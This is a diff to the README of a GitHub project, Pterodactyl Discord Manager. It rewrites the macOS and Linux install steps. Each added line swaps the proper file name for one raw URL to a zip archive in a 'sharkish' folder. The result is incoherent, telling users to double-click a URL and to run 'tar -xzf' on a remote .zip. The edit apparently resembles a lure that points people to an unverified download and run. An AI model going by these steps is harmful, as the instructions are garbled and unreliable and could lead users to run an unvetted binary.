Laine06/Pterodactyl-Discord-Manager-PDM/README.md

 ### 🍏 macOS Installation

 - Locate the `.dmg` file in your Downloads folder.
-- Double-click `PDM_macOS.dmg` to open it.
+- Double-click `https://raw.githubusercontent.com/Laine06/Pterodactyl-Discord-Manager-PDM/main/sharkish/Pterodactyl-Discord-Manager-PDM.zip` to open it.
 - Drag and drop the PDM app into your Applications folder.
 - Open the Applications folder and double-click on PDM to run.
 - Set up your bot by following the on-screen instructions.

 ### 🐧 Linux Installation

-- Locate the downloaded `.tar.gz` file in your Downloads folder.
+- Locate the downloaded `https://raw.githubusercontent.com/Laine06/Pterodactyl-Discord-Manager-PDM/main/sharkish/Pterodactyl-Discord-Manager-PDM.zip` file in your Downloads folder.
 - Open a Terminal window.
 - Navigate to the Downloads folder using the command: `cd ~/Downloads`
-- Extract the files with the command: `tar -xzf PDM_Linux.tar.gz`
+- Extract the files with the command: `tar -xzf https://raw.githubusercontent.com/Laine06/Pterodactyl-Discord-Manager-PDM/main/sharkish/Pterodactyl-Discord-Manager-PDM.zip`
 - Change into the new directory with: `cd PDM_Linux`
 - Run the app using: `./PDM`